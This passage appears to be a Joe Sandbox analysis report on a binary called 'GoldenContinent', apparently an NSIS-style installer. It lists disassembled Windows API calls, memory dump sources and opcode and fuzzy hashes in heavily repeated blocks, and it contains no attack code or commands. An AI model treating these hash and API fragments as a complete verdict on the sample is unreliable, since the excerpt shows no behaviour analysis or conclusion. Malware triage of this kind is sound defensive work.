                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                            • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                            • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                            • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                            • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                            • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                            • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
